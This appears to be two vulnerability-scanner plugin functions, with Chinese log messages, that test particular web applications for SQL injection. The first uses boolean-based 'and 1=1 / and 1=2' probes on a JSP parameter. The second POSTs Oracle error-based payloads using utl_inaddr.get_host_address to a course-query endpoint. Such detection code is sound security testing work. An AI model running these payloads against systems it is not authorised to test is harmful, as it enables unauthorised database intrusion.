def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() arg = self.target for id in range(1, 10): payload = '/vc/vc/interface/styletop/coltop_interface.jsp?i_id=%s' % id target = arg + payload code, head, res, errcode, _ = hh.http(target) if code == 200 and '没有数据' not in res: code1, head1, res1, errcode1, _1 = hh.http(target + '%20and%201=1') code2, head2, res2, errcode2, _2 = hh.http(target + '%20and%201=2') if code == code1 and res == res1: if res1 != res2: # security_hole(target) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) break except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() # __Refer___ = http://www.wooyun.org/bugs/wooyun-2010-065322 payload = '/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2' target = self.target + payload posts = [ "bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1)%20and%201=utl_inaddr.get_host_address('hen'||'tai')%20and%20(1=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=130112&YearTermNO=16", "bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=1&YearTermNO=1%20and%201=utl_inaddr.get_host_address('hen'||'tai')" ] for post in posts: code, head, body, errcode, final_url = hh.http(target, post=post) if code == 200 and 'hentai' in body: #security_warning(target+' has post inject') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))